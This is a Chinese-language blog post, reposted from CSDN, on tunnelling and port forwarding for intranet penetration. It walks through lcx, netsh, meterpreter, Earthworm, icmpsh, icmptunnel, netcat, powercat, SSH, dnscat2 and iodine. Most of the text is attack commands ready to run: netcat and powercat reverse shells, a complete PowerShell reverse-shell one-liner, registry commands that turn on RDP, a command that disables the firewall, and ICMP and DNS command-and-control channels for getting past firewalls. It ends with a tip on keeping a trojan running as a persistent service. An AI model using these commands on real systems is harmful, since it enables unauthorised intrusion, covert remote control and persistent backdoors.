文章目录
内网渗透之常见隧道转发
一、基本介绍
二、工具介绍及使用
端口转发
1、Lcx.exe
2、netsh
3、msf端口转发
内网转发
1、Earthworm
2、reGeorg+proxifier/proxychains
3、frq
隐藏隧道
网络层
1、ipv6隧道
2、icmpc2通道及隧道传输
传输层
1、nc
2、powercat
应用层
1、ssh隧道
2、HTTP/HTTPS隧道
3、DNS隧道
维持后门
端口转发:
用于目标机器对某一端口的访问进行了限制,主要就是可以将本机的端口或者是本机可以访问到的任意主机的端口转发到任意一台你需要访问的公网 IP 上。
端口映射:
就是将一个内网无法访问的端口映射到公网上的某个端口,进而进行攻击,例如最喜欢的3389!
内网转发:
主要用于在目标机器上做跳板,进而可以对内网进行攻击!
隐藏隧道:
由于防火墙存在,会检测对外连接情况,如发现异常就会阻断,隧道就是绕过防火墙,封装数据绕过屏蔽的通信方式
二、工具介绍及使用
端口转发
1、Lcx.exe
lcx.exe是一个端口转发映射工具,Windows版是lcx.exe,Linux版为portmap,主要就三个参数监听映射转向.
Windows情况下:
目标主机执行
lcx.exe -slave 公网主机ip 8888 目标ip 3389lcx.exe –listen 8888 5555
lcx -tran 6666 目标ip 3389LINUX情况下:
目标主机执行
./portmap -m 3 -h1 目标ip -p1 22 -h2 公网ip -p2 8888公网主机监听,即可成功映射
./portmap -m 2 -p1 8888 -h2 公网ip -p2 12345
开启3389端口:通杀:wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 12003:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f2008:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f多版本win08 win03 win7 win2012 winxp 执行3条:1.wmic /namespace:rootcimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 12.wmic /namespace:rootcimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 13.reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f开了远程桌面找不到?简单暴力办法看看服务器有木有电话qq之类的,直接联系管理员问问,好好的3389端口非得换,不知道我找不到吗?不闹了!容易挨打!1、cmd执行:REG query HKLMSYSTEMCurrentControlSetControlTerminal" "ServerWinStationsRDP-Tcp /v PortNumber2、cmd执行:tasklist /svc查询TermService对应PID,然后在netstat -ano查询的PID对应的端口号3、查找注册表:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server Wds dpwdTds cp 中PortNumber的值
2、netsh
netsh(Network Shell) 是一个windows系统本身自带的工具,可以用来做端口转发。因为他可以把本地端口的任意一个TCP连接都可以被重定向到另一个端口,或远程计算机的任意端口上。
前提:
2003、xp系统需要安装IPV6(netsh interface ipv6 install),其他版本直接可以使用。
启动服务中的IPv6 Helper Service/IP Helper,如果不行可以关闭服务器或添加入栈规则(netsh firewall set opmode disable)
基本语句
添加netsh interface portproxy add v4tov4 listenaddress=本地 listenport=port connectaddress=ip connectport=port删除netsh interface portproxy delete v4tov4 listenport=port查看netsh interface portproxy show all
netsh advfirewall firewall add rule name="8888" dir=in action=allow protocol=TCP localport=26netsh interface portproxy add v4tov4 listenaddress=ip listenport=26 connectaddress=10.0.0.1 connectport=3389
3、msf端口转发
msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。
portfwd add -l 8888 -p 3389 -r 172.16.86.153 #-l为本地监听端口,-p 目标端口,-r 目标ip然后即可将转发目标主机的3389到本地的8888,直接连接即可rdesktop 127.1.1.0:8888。
portfwd list/delete/flush 列表/删除/清空
内网转发
内网转发也就是隧道技术它通常是将一个网络协议封装为另一个网络协议的payload。
1、Earthworm
Earthworm 是一套便携式的网络穿透工具,具有 SOCKS5代理、端口转发、端口映射等功能,优点比如穿透能力强,支持多平台等
主要三个模块:
正向代理 ssocksd、
反向代理 rcsocks,rssocks
端口转发 lcx_listen,lcx_slave,lcx_tran
首先简单画拓扑,利用服务器当作跳板访问探测内网。
2、reGeorg+proxifier/proxychains
regeorg主要是把内网服务器的端口通过http/https隧道转发到本机。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用webshell建立一个socks代理进行内网穿透,服务器必须支持aspx、php或jsp这些web程序中的一种。
3、frq
隐藏隧道
网络层:ipv6隧道、icmp隧道传输层:tco隧道、udp隧道、端口转发应用层:ssh隧道、http隧道、https隧道、DNS隧道
网络层
1、ipv6隧道
IPv6协议隧道方法 用于连接处于IPv4海洋中的各孤立的IPv6岛(将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6报文整体封装在IPv4数据报文中,使IPv6报文能够穿过IPv4海洋,到达另一个IP)。此方法要求隧道两端的IPv6节点都是双栈节点(对于IPv4包和IPv6包都使用相同的地址),即也能够发送IPv4包。
IPv6隧道的工作过程如下:
1、节点A要向节点B发送IPv6报文,首先需要在节点A和节点B之间建立一条隧道2、节点A将IPv6报文封装在以节点B的IPv4地址为目的地址,以自己的IPv4地址为源地址的IPv4报文中,并发往IPv4海洋3、在IPv4海洋中,这个报文和普通IPv4报文一样,经过IPv4的转发到达节点B4、节点B收到此报文之后,解除IPv4封装,取出其中的IPv6报文
配置隧道和自动隧道的主要区别在于:只有执行隧道功能的节点的IPv6地址是IPv4兼容地址时,自动隧道才是可行的。在为执行隧道功能的节点建立I P地址时,自动隧道方法无需进行配置;而配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址,例如采用D H C P、人工配置或其他IPv4的配置机制。
支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等
2、icmpc2通道及隧道传输
icmp相当于其他协议更具有隐蔽性,因为防火墙会默认放此协议,当你拿到一台服务器,防火墙禁止外出流量,可以将数据封装在ping中带出,穿过防火墙限制。
icmpC2通道
icmpsh是应该利用icmp反弹shell1的工具,icmpsh的目标主机只能是Windows(不需要管理权限),控制端只能是Linux。
控制端kali首先下载,并且需要关闭内核对ping的反应,进而执行即可。
git clone https://github.com/inquisb/icmpsh.gitsysctl -w net.ipv4.icmp_echo_ignore_all=1./icmpsh_m.py 攻击者ip 目标ip>
icmpsh.exe -t 攻击者ip
隧道传输
将TCP连接通过ICMP封装进行传送的一种方法。
icmptunnel是一个将流量封装到 ICMP包中的隧道工具,可以绕过防火墙的隐蔽连接。
攻击端首先安装icmptunnel,然后禁用icmp回应影响。
git clone https://github.com/jamesbarlow/icmptunnel.gitmakesysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmptunnel -s/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
sysctl -w net.ipv4.icmp_echo_ignore_all=1./icmptunnel 攻击ip/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0
传输层
1、nc
主要通过tcp和udp的网络连接读取数据等。
客户端监听nc -lvp 8888 -e /bin/shnc -lvp 8888 -e c:windowssystem32cmd.exe服务端反弹nc 服务端ip 8888
客户端监听nc -lvp 8888服务端反弹nc ip 8888 -e /bin/shnc ip 8888 -e c:windowssystem32cmd.exe
场景 :攻击机->防火墙-》服务器和数据库同一内网(攻击可以访问服务器,访问不了数据库)
攻击机监听
nc -lvp 8888
数据库
nv -lvp 8888 -e /bin/sh
web服务器
nc -v 攻击ip 8888 -c "nc -v 数据库ip 8888"
然后攻击机即可访问数据库。
2、powercat
PowerCat是NetCat的PowerShell形式,使用也一样
正向连接:Windows上反弹shell到kali
Kali:nc -lvp 8888Windows:Import-Module .powercat.ps1powercat -c kaliip -p 8888 -e c:windowssystem32cmd.exe
Kali:nc 目标ip 8888 -vvWindows:Import-Module .powercat.ps1powercat -lvp 8888 -e c:windowssystem32cmd.exe
Windows之间互弹shell
w7监听:
Import-Module .powercat.ps1powercat -lvp 8888
w10连接:
Import-Module .powercat.ps1powercat -c 192.168.10.1 -p 8888 -ep
or
w7监听:
Import-Module .powercat.ps1powercat -lvp 8888
w10连接:
.reverse.ps1ps1=$client=New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
接收端:Import-Module .powercat.ps1powercat -lvp 8888 -of test.txt发送端:Import-Module .powercat.ps1powercat -c 192.168.10.1 -p 8888 -i C:UsersDesktoptest.txt -v
PowerCat进行DNS隧道通信
PowerCat也是一套基于DNS通信的协议,PowerCat的DNS通信是基于dnscat
git clone https://github.com/iagox86/dnscat2.gitcd dnscat2/server/gem install bundlerbundle install
然后
ruby dnscat2.rb ttpowercat.test -e open --no-cache目标执行
powercat -c kaliip -p 53 -dns ttpowercat.test -e cmd.exe然后kali执行session -i 1即可
场景 :攻击机->防火墙-》w7和w10同一内网(攻击机以w7做跳板访问w10)
w10执行
powercat -lvp 8888 -e cmd.exew7执行
powercat -lvp 9999 -r tcp:ip(w10):8888最后kali执行,即可访问
nc ip(w7) 9999 -vvor
dns隧道
w7执行
powercat -l -p 9999 -r dns::ip(w7)::ttpowercat.testkali执行
ruby dnscat2.rb ttpowercat.test -e open --no-cachew10执行,即可获取sessions -i 1
powercat -c ip(本机) -p 9999 -v -e cmd.exe应用层
1、ssh隧道
-C 压缩传输-f 后台传输-N 建立看不到具体会话的连接-L 本地端口转发-g 允许远程主机连接本地用于转发端口-R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口-D 动态转发(socks代理)-P 指定ssh端口
本地转发
将本地机(客户机)的某个端口转发到远端指定机器的指定端口.
场景:kali- 》防火墙-》web服务器-》内网服务器
目的:kali访问内网服务器3389端口
思路:以web服务器当跳板,将内网服务器3389端口映射到web服务器1234端口,然后访问1234即可访问内网3389
kai上执行
ssh -CfNg -L 1234:内网ip:3389 root@web服务器然后kali即可访问3389了
远程转发
将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
场景:kali- 》防火墙-》web服务器-》内网服务器
目的:kali访问内网服务器3389端口
思路:以web服务器当跳板,将kali5555端口的流量转发到内网服务器3389端口,访问5555即可访问内网服务器3389
web服务器上执行
ssh -CfNg -R 5555:内网ip:3389 root@kaliip然后kali访问5555即可
动态转发
建立一个ssh加密的socks4/5代理通道,只要支持socks4/5的都可以使用该隧道通信
场景:kali- 》防火墙-》web服务器-》内网服务器80web服务
目的:kali通过浏览器访问内网服务器80web服务
思路:在kali建立以web服务器基础的sockets5隧道,然后浏览器设置sockets代理,即可访问内网web80web服务器
kai上执行
ssh -CfNg -D 1234 root@web服务器ip然后挂上浏览器sockets代理即可访问。ssh反向隧道
简单的来说就是在目标内网机上做到公网服务器的反向代理;然后在公网服务器做正向的代理实现内网到公网的转发
目标内网服务器:ssh -fCNR 192.168.119.129:8888:localhost:22 [email protected] #将本机的22号端口的流量都转发给公网服务器8888端口
ssh -fCNL *:1111:localhost:8888 localhost #、将公网服务器的1111端口的流量都转发给服务器的8888端口
ssh -p 1111 root@公网ip
这种方法不稳定,可以利用AutoSSH建立稳定SSH隧道
首先目标内网服务器和公网服务器apt install autossh
目标内网服务器生成ssh-keygen公钥私钥,并ssh-copy-id root@ip到公网服务器中,实现免密登陆
autossh -M 5000 -NR 8888:localhost:22 [email protected] -p 22) 同理上即可
2、HTTP/HTTPS隧道
常见的regeorg、meterperter、tunna等,利用http隧道进行代理,在爆破3389等比较隐蔽,特征不明显。
3、DNS隧道
DNS协议解析过程分为两种,迭代查询和递归查询(一次请求),DNS隧道是隐蔽信道的一种,通过将其他协议封装在DNS协议中进行通信。封装由客户端完成,将DNS流量还原成正常的流量由服务器完成。
常用的工具Dnscat2、iodine、Dns2tcp等
Dnscat2
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,解析常见的类型:A、CNAME、MX、TXT……类型,它的优点就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成比如文件上传、下载、反弹Shell,
在服务端机器上,执行:
服务端
sudo ruby./dnscat2.rb abc.com --secret=123456 #1,自定义DNS传输的域名以及密码sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=5555,type=TXT --secret=123456 #2,监听本机5555sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache #方式3
客户端dnscat --secret=123456 abc.com #1dnscat --dns server=dnscat2 server ip>,port=5555,type=TXT #2
客户端连上后,会提示:Session established!
服务端的控制台输入:windows,即可以看到一个客户端上线:
使用window -i 1,即可进入该通道;
常用的有:
quit (退出控制台)kill <id> (中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i <id>(连接某个通道)
clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
iodine
iodine这个工具可以大致分为中继和直连两种类型,中继需要在外网有自己的服务器,迭代请求,直连在客户端直接向指定IP的恶意DNS服务器发起DNS解析请求,而且传输文件的速度非常快,是一种主流工具。iodine主要分服务端与客户端。当客户端请求该域名的解析,就可以建立通道连接。iodine支持各种系统以及NULL,TXT,SRV,MX,CNAME,A等多种查询请求类型。
客户端:
客户端:sudo iodine -f -r xxx.com -M 200 -P 123456 //xxx.com为自定义DNS传输的主域名sudo iodine -P 123456 -f -r -T TXT <dns服务商,不写就直连> abc.com-r 强制在任何情况下使用DNS隧道
-f 将使客户端保持在前台运行
-t 使用的DNS类型
-M 表示最大的上传域名长度
维持后门
比如利用NSSM,封装某一木马软件exe封装为系统服务,然后服务器设置自动启动即可。
删除利用nssm remove
余生很长,请多指教。
版权声明:本文为CSDN博主「SoulCat.」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/csacs/article/details/90723513
没有专业运营团队,纯个人凭着空闲时间的学习,通过网络搜集与学习整理的资料记录并分享。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论